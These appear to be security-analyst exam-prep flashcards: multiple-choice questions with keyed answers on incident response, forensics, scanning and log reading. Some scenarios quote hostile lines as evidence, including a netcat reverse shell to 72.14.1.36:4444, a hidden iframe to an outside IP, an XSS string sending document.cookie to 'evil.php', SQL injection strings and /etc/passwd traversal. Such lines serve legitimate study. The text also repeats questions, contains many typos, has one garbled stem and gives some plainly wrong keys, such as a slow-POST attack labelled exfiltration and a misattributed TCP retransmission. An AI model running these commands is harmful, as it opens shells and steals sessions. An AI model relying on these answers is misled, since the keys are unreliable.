Bootcamp Flashcards
- Which of the following command line utilities would an analyst use on an end-user PC to determine the parts it is listening on?
a. tracert
b. ping
c. nslookup
d. netstat
d. netstat
- An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources have asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement?
a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
b. Degauss the hard drive and then copy to a hard drive of at least equivalent size using ITFS formatting.
c. Log onto the computer with administrator privileges and copy the hard drive to an external storage device.
d. Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.
a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
- Which of the following is a vulnerability when using a window as a host OS for virtual machines?
a. Window requires frequent patching.
b. Windows virtualized environments are typically unstable.
c. Windows requires hundreds of open firewall ports to operate.
d. Windows is vulnerable to the “ping of death”.
a. Window requires frequent patching.
- A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process?
a. Wipe hard drives, reimage the system, and return the affected systems to a ready state.
b. Direct and analyze the precursors and indicators; schedule lessons learned meeting.
c. Remove the malware and inappropriate materials; eradicate the incident.
d. Perform event correlation; create a log retention policy.
a. Wipe hard drives, reimage the system, and return the affected systems to ready state.
- The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensation controls can be used to help meet management’s expectations?
a. Separation of duties
b. Scheduled reviews
c. Dual control
d. Outsourcing
d. Outsourcing
- Which of the following command line utilities would an analyst use on an end-user PC to determine the parts it is listening on?
a. Tracert
b. Ping
c. Nslookup
d. Netstat
d. Netstat
- An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources has asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement?
a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
b. Degauss the hard drive and then copy to a hard drive of at least equivalent size using ITFS formatting.
c. Log onto the computer with administrator privileges and copy the hard drive to an external storage device.
d. Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.
a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
- Which of the following is a vulnerability when using window as a host OS for virtual machines?
a. Window requires frequent patching.
b. Windows virtualized environments are typically unstable.
c. Windows requires hundreds of open firewall ports to operate.
d. Windows is vulnerable to the “ping of death”.
=
a. Window requires frequent patching.
- A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process?
a. Wipe hard drives, reimage the system, and return the affected systems to ready state.
b. Direct and analyze the precursors and indicators; schedule a lessons learned meeting.
c. Remove the malware and inappropriate materials; eradicate the incident.
d. Perform event correlation; create a log retention policy.
a. Wipe hard drives, reimage the system, and return the affected systems to ready state.
- The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensation controls can be used to help meet management’s expectations?
a. Separation of duties
b. Scheduled reviews
c. Dual control
d. Outsourcing
d. Outsourcing
- ## An organization has had problems with security teams remediating vulnerabilities that are either false positives or are not applicable to the organization’s server. Management has put emphasis on security teams conducting details analysis and investigation before conducting any remediation. The output from a recent Apache web server scan is shown below:Scan Host: 192.168.1.18
15-Jan-16 10:12:10.1 PDT
Vulnerability CVE-2006-5752
Cross-site scripting (XSS) vulnerability in the mod_status module of Apache server
(httpd), when ExtendedStatus is enabled and a public-server-status page is used, allows remote attackers to inject arbitrary web script or HTML.
Severity: 4.3 (medium)
—
The team performs some investigation and finds the statement from Apache on 07/02/2008. “Fixed in Apache HTTP server 2.2.6, 2.0.61, and 1.3.39”
Which of the following conditions would require the team to perform remediation on this finding?
a. The organization is running version 2.2.6 and has ExtendedStatus enabled.
b. The organization is running version 2.0.59 and is not using a public-server-statuspage.
c. The organization is running version 1.3.39 and is using a public-sever-statuspage.
d. The organization is running version 2.0.5 and has ExtendedStatus enabled.
d. The organization is running version 2.0.5 and has ExtendedStatus enabled.
- Which of the following tools should an analyst use to scan for web server vulnerabilities?
a. Wireshark
b. Qualys
c. ArcSight
d. SolarWinds
b. Qualys
- An analyst preparing for a technical security compliance check on all Apache servers. Which of the following will be the BEST to use?
a. CIS benchmark
b. Nagios
c. Untidy
d. Chain & Abel
a. CIS benchmark
- A technician is troubleshooting a desktop computer with low disk space. The technician reviews the following information snippets:
Disk Allocation Report
350GB - C:\user1\movies\movies
Network Stats
Proto Local Address Foreign Address State
TCP 0.0.0.0:8080 0.0.0.0 LISTENING movieDB
TCP 192.168.1.10:8080 172.16.34.77:1200 TIME_WAIT
Which of the following should the technician do the BEST resolve the issue based on the above information? (Select TWO)
a. Delete the movie\movies directory.
b. Disable the movieDB service.
c. Enable OS auto updates.
d. Install a file integrity tool.
e. Defragment the disk.
a. Delete the movie\movies directory.
b. Disable the movieDB service.
- A cybersecurity analyst was asked to review of web vulnerability scan logs. Given the following snippet of code:
Iframe src=”http://65.240.22.1” width=”0” height=”0” franeborder=”0”
tabindex=”-1” title=”empty” style=visibility:hidden;display:none
/iframe
Which of the following BEST describes the situation and recommendations to be made?
a. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
b. The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
d. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
- A cybersecurity analyst is currently auditing a new Active Directory server for compliance. The analyst uses Nessus to do the initial scan, and Nessus reports the following:
PluginID IP Port
10955 192.168.1.215 Microsoft-ds (445/tcp)
11210 192.168.1.215 Microsoft-ds (445/tcp)
12350 192.168.1.215 Netbus (35/udp)
12345 192.168.1.215 Ftp (21/tcp)
Which of the following critical vulnerabilities has the analyst discovered?
a. Known backdoor
b. Zero-day
c. Path disclosure
d. User enumeration
a. Known backdoor
- Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Select THREE).
a. Multifactor authentication
b. Network segmentation
c. Single sign-on
d. Encryption
e. Complexity policy
f. Biometrics
g. Obfuscation
a. Multifactor authentication
b. Network segmentation
e. Complexity policy
- A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discovers that data from the database can be mined from over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?
a. Configure the database to listen for incoming connections on the internet network.
b. Change the database connection string and apply the necessary patches.
c. Configure an ACL in the border firewall to block all connections to the webserver for ports different than 80 and 443.
d. Deploy a web application firewall to protect the web application from attacks to the database.
c. Configure an ACL in the border firewall to block all connections to the webserver for ports different than 80 and 443.
- A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Select TWO).
a. Validate the folder and file directory listings on both.
b. Check the hash value between the image and the original.
c. Boot up the image and the original system to compare.
d. Connect a write blocker to the imaging device.
e. Copy the data to a disk of the same size and manufacturer.
b. Check the hash value between the image and the original.
d. Connect a write blocker to the imaging device.
- A company’s IDP/DLP solution triggered the following alerts:
a. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234
b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
c. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53
d. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445
e. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21
b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
- **A company’s IDP/DLP solution triggered the following alerts:
a. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234
b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
c. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53
d. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445
e. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21
b. B
- A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?
a. Phishing
b. Whaling
c. Spam
d. Ransomware
b. Whaling
- A security analyst is conducting traffic analysis and observes an HTTP POST to the company’s main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of?
a. Exfiltration
b. DoS
c. Buffer overflow
d. SQL injection
a. Exfiltration
- A security analyst wants to confirm a finding from a penetration test report on the internal webserver. To do so, the analyst logs into the webserver using SSH to send the request locally. The report provides a link to https://hrserver.internal/../etc/paswd. And the server IP address is 10.10.10.15 However, after several attempts, the analyst cannot get the file, despite attempting to get it using different ways, as shown below:
Request Response
https://hrserver.internal/../…/etc/paswd Host not found
https://localhost/../…/etc/passwd File not found
https://10.10.10.15/../…/etc/passwd File not found
Which of the following would explain this problem? (Select TWO)
a. The web server uses SNI to check for a domain name.
b. Request can only be sent remotely to the webserver
c. There is no local name resolution for hrserver internal
d. The password file is write protected
e. The web server has not started
a. The web server uses SNI to check for a domain name.
c. There is no local name resolution for hrserver internal
- A SIEM alert occurs with the following output:
Mac IP Duration Logged on
01:23:45:33:89:cc 192.168.122.3 15 h gours Yes
01:23:45:33:89:cc 192.168.122.9 4 days Yes
Which of the following BEST describes this alert?
a. The alert is a positive, there is a device with dual NICs.
b. The alert is valid because IP spoofing may be occurring on the network.
c. The alert is a false positive, both NICs are of the same brand.
d. The alert is valid because there may be a rogue device on the network
d. The alert is valid because there may be a rogue device on the network
- A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem?
a. The access point is blocking access by MAC address. Disable MAC address filtering.
b. The network is not available. Escalate the issue to network support.
c. Expired DNS entries exist on users’ devices. Request the affected users perform a DNS flush.
d. The access point is a rogue device. Follow incident response procedures.
d. The access point is a rogue device. Follow incident response procedures.
- An application contains the following log entries in a file named “authlog.log”.
User ‘oidc-provider-fb:john’ successfully logged in 2016-01-01 23:00:01
User ‘local:Administrator’ successfully logged out 2016-01-01 23:00:05
User ‘oidc-provider-fb:kate’ successfully logged out 2016-01-01 23:00:07
A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task?
a. grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g
b. cat authlog.log | grep “2016-01-01” | echo “valid username found: $2”
c. echo authlog.log > sed ‘s/User//’ | print “username exists: $user”
d. cat “authlog.log” | grep “User” | cut -F’ ‘ | “username exists: $1”
a. grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g
- An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process?
a. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.
b. Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production.
c. Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment.
d. Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities.
a. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.
- When reviewing the system log, the cybersecurity analyst noticed a suspicious log entry.
• Wmic /node:HRDepartment1 computersystem get username
Which of the following combinations describes what occurred, and what action should be taken in this situation?
a. A rogue user has queried for users logged in remotely. Disable local access to network shares.
b. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command.
c. A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt.
d. A rogue user has queried for the user logged in remotely. Attempt to determine who executed the command.
d. A rogue user has queried for the user logged in remotely. Attempt to determine who executed the command.
- A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:
+ Server: nginx/1.4.6 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The x-xss-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type
+ No CGT Directories found (use ‘-c all’ to force check all the possible dirs)
+ Entry ‘/wp-admin/’ in robots.txt returned a non-forbidden or redirect HTTP code
(302)
+ “Robots.txt” contains two entries that should be manually viewed.
In some of the portal’s startup command files, the following command appears:
Nc -e /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output:
# netstat -an
Active Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:443 : LISTEN
tcp 0 52 *:59482 72.14.1.36:4444 ESTABLISHED
tcp 0 0 *:80 : LISTEN
Which of the following is the best step for the analyst to take NEXT?
a. Initiate the security incident response process.
b. Recommend training to avoid mistakes in production command files.
c. Delete the unknown files from the production servers.
d. Patch a new vulnerability that has been discovered
e. Manually review the robots.txt file for error
a. Initiate the security incident response process.
- A cybersecurity analyst wants to use a tool that prevents vulnerabilities in software from being successfully exploited. Which of the following tools can be implemented to achieve this goal?
a. HIPS
b. EMET
c. Helix
d. Nessus
a. HIPS
- Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record?
a. ifconfig
b. ping
c. arp
d. nbtstat
b. ping
- Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process?
a. To comply with existing organizational policies and procedures on interacting with internal and external parties.
b. To ensure all parties, know their roles and effective lines of communication are established
c. To identify which group will communicate details to law enforcement in the event of a security incident
d. To predetermine what details should or should not be shared with internal or external parties in the event of an incident
b. To ensure all parties, know their roles and effective lines of communication are established
- During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following information should be shown to the officer?
a. Letter of engagement
b. Scope of work
c. Timing information
d. Team reporting
b. Scope of work
- A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the company’s firewall, while all production networks are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which one is the honeynet’s network?
a. Banner grab
b. Packet analyzer
c. Fuzzer
d. TCP ACK scan
d. TCP ACK scan
- A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included.
Source Destination Application Packets Volume (kbps)
8.4.4.100 172.16.1.25 SMTP 4386 6141
96.23.114.14 172.16.1.1 ITSec 7734 10827
172.16.1.101 100.15.25.34 HTTP 3412 4776
96.23.114.18 172.16.1.1 IPSec 2723 3812
172-16.1.101 100.15.25.34 SSL 8697 12176
172.16.1.222 203.67.121.12 Quicktime 1302 1822
172.16.1.197 113.121.12.15 8180/tcp 6045 8463
172.16.1.131 172.16.1.67 DHCP 25 35
172.16.1.25 172.16.1.53 DNS 66 93
Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues?
a. Perform a reverse lookup on each of the IP addresses listed to help determine if the traffic is necessary.
b. Recommend that networking block the unneeded protocols such as QuickTime to clear up some of the congestion.
c. Put ACLs in place to restrict traffic destined for random or non-default application ports.
d. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.
c. Put ACLs in place to restrict traffic destined for random or non-default application ports.
- During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in form multiple external locations, including several overseas. Further review of the account showed access right to several corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?
a. RADIUS identity management
b. Context-based authentication
c. Privilege escalation restrictions
d. Elimination of self-service password resets
b. Context-based authentication
- On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability?
a. VDI systems
b. Mobile devices
c. Enterprise server Oss
d. VPNs
e. VoIP phones
b. Mobile devices
- A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation?
a. Fuzzing
b. Input validation
c. Change control
d. Sandboxing
c. Change control
- The SOC shift supervisor is looking through the administrator access logs for the key network devices. The supervisor notices there are no administrative access entries for the previous day but knows IOS upgrades were scheduled on key network devices, according to the change control board notifications form the last shift logs. Which of the following is the MOST likely cause?
a. Someone cleared the log files to cover malicious activity.
b. Updates and upgrades were pushed out to a later date.
c. SNMP community string was changed in the upgrade process.
d. There were issues aggregating the individual log files into the administrator access logs.
a. Someone cleared the log files to cover malicious activity.
- A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exits. The analyst uses the following snippet of code:
Username: admin ‘ ; –
Password: ‘ OR 1=1 –
Which of the following vulnerabilities is the analyst checking for?
a. Buffer overflow
b. SQL injection
c. Default password
d. Format string attack
b. SQL injection
- The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this?
a. A control
b. A standard
c. A policy
d. A guideline
c. A policy
- ** An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST?
a. Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated.
b. Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data.
c. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted.
d. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.
d. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.
- Given the following code:
var adr =”../evil.php?breadomonster=’ +escape{document.cookie}; var query = “SELECT * FROM users WHERE name=’smith’;
Which of the following types of attacks is occurring?
a. Privilege escalation
b. XSS
c. Session hijacking
d. MITM
e. SQL injection
b. XSS
- ** Which of the following should be used to correlate multiple events from different regions, time zones, and time periods?
a. Snort
b. ArcSight
c. Imperva
d. Nessus
b. ArcSight
- ** A security analyst is running a penetration test against a client’s external firewall. The analyst runs an attack that attempts to flood the firewall from multiple locations while denying access to others. Which of the following attacks did the analyst perform?
a. Fuzzing
b. DDoS
c. Ping of death
d. MITM
b. DDoS
- A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usauge, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, even though no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason that no significant changes in work habits have occurred? An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?
a. Advanced persistent threat
b. Zero day
c. Trojan
d. Logic bomb
b. Zero day
- A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Select TWO)
a. Set up a sinkhole for that dynamic DNS domain to prevent communication.
b. Isolate the infected endpoint to prevent the potential spread of malicious activity.
c. Implement an internal honeypot to catch the malicious traffic and trace it.
d. Perform a risk assessment and implement compensating controls.
e. Ensure the IDS is active on the network segment where the endpoint resides.
a. Set up a sinkhole for that dynamic DNS domain to prevent communication.
b. Isolate the infected endpoint to prevent the potential spread of malicious activity.
- ** After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the user’s roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation?
a. Reconfigure Radius.
b. Implement MFA.
c. Upgrade to the latest TLS.
d. Salt password hashes.
b. Implement MFA.
50. A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator can ping every device on the network and confirms that the network is very slow. Administrator’s PC: 192.168.1.20 User’s PC: 192.168.1.22 AP-Finance: 192.168.1.10 AP-Workshop: 192.168.1.11 AP-Lounge: 192.168.1.12 AP-Reception: 192.168.1.13 AP-Warehouse: 192.168.1.14 AP-IT: 192.168.1.15 Output Interface: 192.168.1.20 --- 0xf Internet Address Physical Address Type 192.168.1.4 1a-25-0d-df-c6-27 dynamic 192.168.1.5. 1a-25-0d-df-c8-00 dynamic 192.168.1.10 00-dc-3b-67-81-1a dynamic 192.168.1.11 c4-02-03-a1-4a-01 dynamic 192.168.1.12 00-dc-3b-67-82-02 dynamic 192.168.1.13 00-dc-3b-a5-ba-0b dynamic 192.168.1.14 00-dc-3b-67-88-07 dynamic 192.168.1.15 00-dc-3b-67-80-0a dynamic 192.168.1.20 1a-25-0d-df-8d-82 dynamic 192.168.1.22 1a-25-0d-df-89-cb dynamic Given the above result, which of the following should the administrator investigate FIRST?
a. The AP-Workshop device
b. The AP-Reception device
c. The device at 192.168.1.4
d. The AP-IT device389
e. The user’s PC
b. The AP-Reception device
- A security analyst’s daily review of system logs and SIEM showed fluctuating patterns of latency. During the analysis, the analyst discovered recent attempts of intrusion-related to malware that overwrite the MBR. The facilities manager informed the analyst that a nearby construction project damaged the primary power lines, impacting the analyst’s support systems. The electric company has temporarily restored power, but the area may experience temporary outages. Which of the following issues should the analyst focus on to continue operations?
a. Updating the ACL
b. Conducting backups
c. Virus scanning
d. Additional log analysis
b. Conducting backups
- ** In comparison to non-industrial IT vendors, ICS equipment vendors generally.
a. Rely less on proprietary code in their hardware products.
b. Have more mature software development models.
c. Release software updates less frequently.
d. Provide more extensive vulnerability reporting.
c. Release software updates less frequently.
- During routine network reconnaissance that is looking for unused but open ports, a company’s scans generate the following packet captures:
132 17.816492 192.168.1.132 192.168.1.1 TCP 58 49151 -> 22 [SYN] Seq=0 win=1024 Len=0
MSS=1460
133 17.816942 192.168.1.132 192.168.1.1 TCP 58 49151 -> 445 [SYN] Seq=0 win=1024
Len=0 MSS=1460
134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 19151 [SYN, ACK] Seq=0 Ack=1
win=5840 Len=0 MSS=1460
134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 49151 [SYN, ACK] Seq=0 Ack=1
win=5840 Len=0 MSS=1460
135 17.819546 192.168.1.132 192.168.1.1 TCP 58 49151 -> 80 [SYN] Seq=0 win=1024 Len=0
MSS=1460
136 17.824887 192.168.1.1 192.168.1.132 TCP 54 445 -> 49151 [RST, ACK] Seq=1 Ack=1
win=0 Len=0
137 17.829763 192.168.1.1 192.168.1.132 TCP 54 80-> 49151 [RST, ACK] Seq=1 Ack=1
Win=0 =Len=0
138 22.063352 192.168.1.1 192.168.1.132 TCP 58 [TCP Retransmission] 22 -> 49151 [SYN,
ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460
Which of the following is the BEST reason for the retransmission is packet 138?
a. Port 22 is closed, and 192.168.1.1 is attempting to complete the closure.
b. Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.
c. port 22 is closed, and 192.168.1.132 is attempting to complete the closure.
d. Port 22 is open, and 192.168.1.1 is attempting to continue the handshake.
b. Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.
- ** An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:
Starting Nmap 4.67 (http://map.org) at 2011-11-03 18:32 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00066s latency).
/>Not shown: 992 closed ports
PORT STATESERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
3306 open mysql
MAC Address:01:AA:FB:23:21:45
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
Given the organization’s policy , which is the following services should be disabled on this server?
a. rpcbind
b. netbios-ssn
c. mysql
d. ssh
e. talent
d. ssh
- ## A system’s authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthorization activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below.Scan Host: 192.168.1.13
15-Jan-16 08:12:10.1 EDT
Vulnerability CVE-2015-1635
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and
Windows Server 2012 allows remote attackers to execute arbitrary code via crafted HTTP
requests, aka “HTTP.sys remote code execution vulnerability”
Severity: 10.0 (high)
Expected Result: enforceHTTPValidation=’enabled’;
Current Value: enforceHTTPValidatoin=enabled;
Evidence:
C:\8system8\windows\config\web.config
———
a. Remediate by going to the web.config file, searching for the enforce HTTP validation the setting, and manually updating to the correct.
b. Accept this risk for now because this is a “high” severity, but testing will require more than the four days available, and the system ATO needs to be completed.
c. Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings.
d. Ensure HTTP validation is enabled by rebooting the server.
a. Remediate by going to the web.config file, searching for the enforce HTTP validation setting, and manually updating to the correct.
- ** A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the webserver. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used?
a. APT
b. Zero-day attack
c. Man-in-the-middle attack
d. XSS
a. APT
- ** A security analyst has been asked to scan a subnet. During the scan, the following output was
generated.sho
[root@scanbox-]# nmap 192.168.100.*
Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST
Interesting ports on ports on purple.company.net (192.168.100.145):
Not shown:1677 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
Interesting ports on lemonyellow.company.net (192.168.100.214)
Not shown: 1676 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open ssl/http
Nmap finished : 256 IP addresses (2 hots up) scanned in 7.223 seconds
Based on the output above, which of the following is MOST likely?
a. 192.168.100.214 is a secure FTP server.
b. 192.168.100.214 is a web server.
c. Both hosts are mail servers.
d. 192.168.100.145 is a DNS server.
b. 192.168.100.214 is a web server.
- ** A company uses a managed IDS system, and a security analyst has noticed a large volume of brute force password attacks originating from a single IP address. The analyst put in a ticket with the IDS provider, but no action was taken for 24 hours, and the attacks continued. Which of the following would be the BEST approach for the scenario described?
a. Draft a new MOU to include response incentive fees.
b. Reengineer the BPA to meet the organization’s needs.
c. Modify the SLA to support organizational requirements.
d. Implement on MOA to improve vendor responsiveness.
c. Modify the SLA to support organizational requirements.
- ** The help desk has reported that users are reusing previous passwords when prompted to change them. Which of the following would be the MOST appropriate control for the security analyst to configure to prevent password reuse? (Select TWO)
a. Implement mandatory access control on all workstations.
b. Implement role-based access control within directory services.
c. Deploy Group Policy Objects to domain resources.
d. Implement scripts to automate the configuration of PAM of Linux hosts.
e. Deploy a single sign-on solution for both Windows and Linux hosts.
c. Deploy Group Policy Objects to domain resources.
d. Implement scripts to automate the configuration of PAM of Linux hosts.
- ** A vulnerability scan comes back with critical findings for a Microsoft SharePoint server.
Vulnerable software installed: office 2007
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrectVersion\Installer\UserData\s-1-5 -18\Products\000021096F0100000100000000F01FEC\InstallProperties - keyexists The office component Microsoft Office Excel Services Web Front End Components is running an affected version - 12.0.6612.1000
Which of the following actions should be taken?
a. Remove Microsoft office from the server.
b. Document the finding as an exception.
c. Install a newer version of Microsoft Office on the server.
d. Patch Microsoft Office on the server.
d. Patch Microsoft Office on the server.
- ** A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred?
a. The vulnerability scanner is unable to properly establish a connection to the server.
b. The scanner agent was improperly installed.
c. The Apache server was patched before the scan was completed.
d. The package manager includes backported versions of Apache.
d. The package manager includes backported versions of Apache.
- ** Which of the following organizations would have to remediate embedded controller vulnerabilities?
a. Banking institutions
b. Public universities
c. Regulatory agencies
d. Hydroelectric facilities
d. Hydroelectric facilities
- ** Which of the following is a security concern found PRIMARILY in virtual infrastructure?
a. Two-factor authentication for network resources
b. Physical hardware supporting multitenancy
c. Airgapped system that will not run on the hypervisor
d. User access to outside resources
b. Physical hardware supporting multitenancy
- ** A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?
a. System isolation
b. Honeypot
c. Jump box
d. Mandatory access control
c. Jump box
